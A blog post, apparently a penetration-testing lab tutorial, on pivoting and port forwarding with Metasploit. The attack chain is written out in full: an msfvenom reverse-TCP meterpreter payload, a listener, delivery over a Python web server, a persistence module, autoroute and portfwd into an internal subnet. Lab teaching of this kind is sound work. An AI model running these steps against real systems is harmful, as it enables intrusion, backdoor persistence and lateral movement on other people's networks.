Open in app

Sign in

Write

Sign in

PIVOTING & PORT FORWADING

Clement 'Tino
7 min readMar 11, 2022

--

Image credits to Tutorialspoint.com

Pivoting a technique used by metasploit to access internal machines in a network that we cannot access from the Outside.

In this post, I will be using 3 machines to demonstrate how this is done.

  • Kali Linux(attacking machine) — In the same subnet with Windows 7 only.
  • Windows 7— In the same subnet with Kali and Metasploitable 2.
  • Metasploitable 2 — In the same subnet with Windows 10 only.

Now I think basic Networking tells us that when two machines are in the same subnet, they can communicate. Since the Kali and Metasploitable 2 machine are in different subnets, they can’t communicate. Meaning, it’s not possible for the Kali network to directly scan and enumerate the Met2 machine(locally).

It’s actually possible if the Kali machine knows the public ip of the Metasploitable 2 machine and we begin our attack by targeting the public ip But over here we are working locally.

How is it possible that one machine can be in two different subnets at a time?

Ans: Because that machine has 2 different network adapters. So each adapter is configured to a different Class of ip address.

So the Windows 7 has two network adapters. One(10.60.32.157) which communicates with class A IPv4 addresses and one(192.168.56.5) that communicates withthe class C IPv4 addresses.

Let’s take a look at our Virtual Machines.

Below is the Kali Linux with an ip of 10.60.32.82.

Kali Linux (attacking machine) ip

This is the Metasploitables 2 machine with an ip of 192.168.56.7 (different class from that of the Kali). Meaning the Kali can’t communicate directly with it.

Metasploitable 2 ip

And this is the windows 7 machine with two network adapters. One which gives it a 192.168.56.5 ip to communicate with the Metasploitable 2 machine and one which gives it a 10.60.32.157 ip to communicate with the Kali Linux machine.

Windows 7 machine ip

Scenario:

You’re an attacker in a black box environment, your target was initially the windows 7 machine. Now as usual, you began with a scan, with hopes of finding a vulnerable service running on the target, maybe you find an exploit for that vuln. You gained an initial foothold on the system, now you look for Privilege Escalation vectors and BAM! you’ve owned the system. Easy right?

Now let’s try that.

Let’s nmap the windows 7 target.

sudo nmap -A -p- -T4 <windows7 ip>
nmap scan results

As shown above, its obvious the Windows 7 machine has nothing to go on about aside the SSH running on it. If we knew the password to the SSH service, that would have been sweet, but in this case we don’t, so let’s try another approach.

There are other methods used to gain access to a windows machine. Here I’m going to go with the Payload method.

Let’s begin by creating our payload with msfvenom.

The syntax goes like this:

msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<local ip> LPORT=<local port> -o payload.exe

where LHOST is the ip of the attacker macine and LPORT is the listening port on the attacker machine.

creating your payload

Now the payload has been created as windows binary. Let’s set up our listener which will be waiting for a connection from our payload.exe the moment it’s executed on the windows 7 machine.

I will be using metasploit’s multi handler to set up the listener. Launch metasploit with command:

msfconsole

now use multi handler as the listener with command

use multi/handler

set the payload type to the same one you used during the creation of payload.exe

set payload windows/meterpreter/reverse_tcp

Now check the options you have to set with:

show options

set the Listening host to the attacker’s ip.

set LHOST <Kali Linux ip>

set the LPORT to the port specified during the payload creation.

set LPORT <payload port>

now to start the listener, type:

run

Now the attacker machine is listening for connections from our payload.exe

setting up the listener

Now let’s find a way to get it unto the window 7 machine. What about hosting it on a server and getting the windows user to download it?

In the same directory where the payload is, let’s start a simple python HTTP server which will host the payload.exe.

python -m SimpleHTTPServer
python server

Now the server is running on port 8000 on the attacker’s local machine.

Now open any browser on your Windows 7 machine and type into the address bar:

http://<attacker's ip>:8000/payload.exe

Now save it and go to your Downloads folder, the downloaded payload.exe should be there.

downloading the payload

Now open the payload on the windows 7 machine.

executing the payload.exe

Now check the listener on the attacking machine, you’ll see a connection was sent back to it.

session opened

Now you get a meterpreter shell. Background that shell with bg. Install a persistence script on the target machine so that in case our meterpreter session dies, we can always spawn a new one.

search for the persistence post-exploit module

search persistence

use it with:

use exploit/windows/local/persistence

look at the options to set with:

show options

Now set the session to our background’d session ID (which is 1)

set session 1

set the LPORT to another random port

set LPORT 1234

now run it to install a persistent vb script on the target.

run

Illustrated below:

setting persistence

After a successful run, you’ll see this:

VB script creation

now move into the session we background’d with:

session 1

switch from a meterpreter shell to a cmd shell with command:

shell

Now type ipconfig to check out the network interfaces of Windows 7

net interfaces of the target

As you can see above, there are two network interfaces, one which we already knew (10.60.32.157) and a different one we had no idea about.

Let’s add that network range to our route list so that our attacker machine can communicate to it.

run autoroute -s 192.168.56.0/24
adding route

Now check all your added routes(you can add more) with:

run autoroute -p
route list

Now that we have added that network range to our route list, why don’t we scan that entire subnet to see the active devices on that machine. Let’s use Nmap.

After scanning, it became evident that there’s another machine on that network(192.168.56.7) aside the windows 7 (192.168.56.5) and it had some juicy ports running on it.

PORTFORWARDING

Portforwarding allows us to set up a port on our local machine which we can use to access a remote service on our target.

It has an HTTP server running at port 80. Now let’s portforward that to a local port(8181) on the attacker machine so that we can access it.

In a meterpreter shell, access the help page of the port forward command with:

portfwd -h
port forward help

Following the syntax from the help above, we can port forward the port 80 to a local port(3232) on the attacker machine with the command:

portfwd add -l <local port> -p <remote port on targets machine> -r <target ip>

NB: Over here the target isn’t the Windows 7 anymore but the Metasploitable 2 machine.

Now that we have successfully port forwarded the web server on the Met2 machine to our local system, let’s try access it in a browser on the attacker machine.

DVWA running on our localhost

You can google DVWA default credentials and try the on this portal.

If I made any mistake anywhere, you can send me a DM on Twitter @tinopreter or on LinkedIn @ClementOseiSomuah

Pivoting
Portfowarding
Metasploit
Metasploitable
Windows

--

--

Clement 'Tino

Written by Clement 'Tino

156 Followers

You can't know it all in one day, compare who you are today to who you were yesterday. Do cybersecurity with love and not out of obligation. One topic a time.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams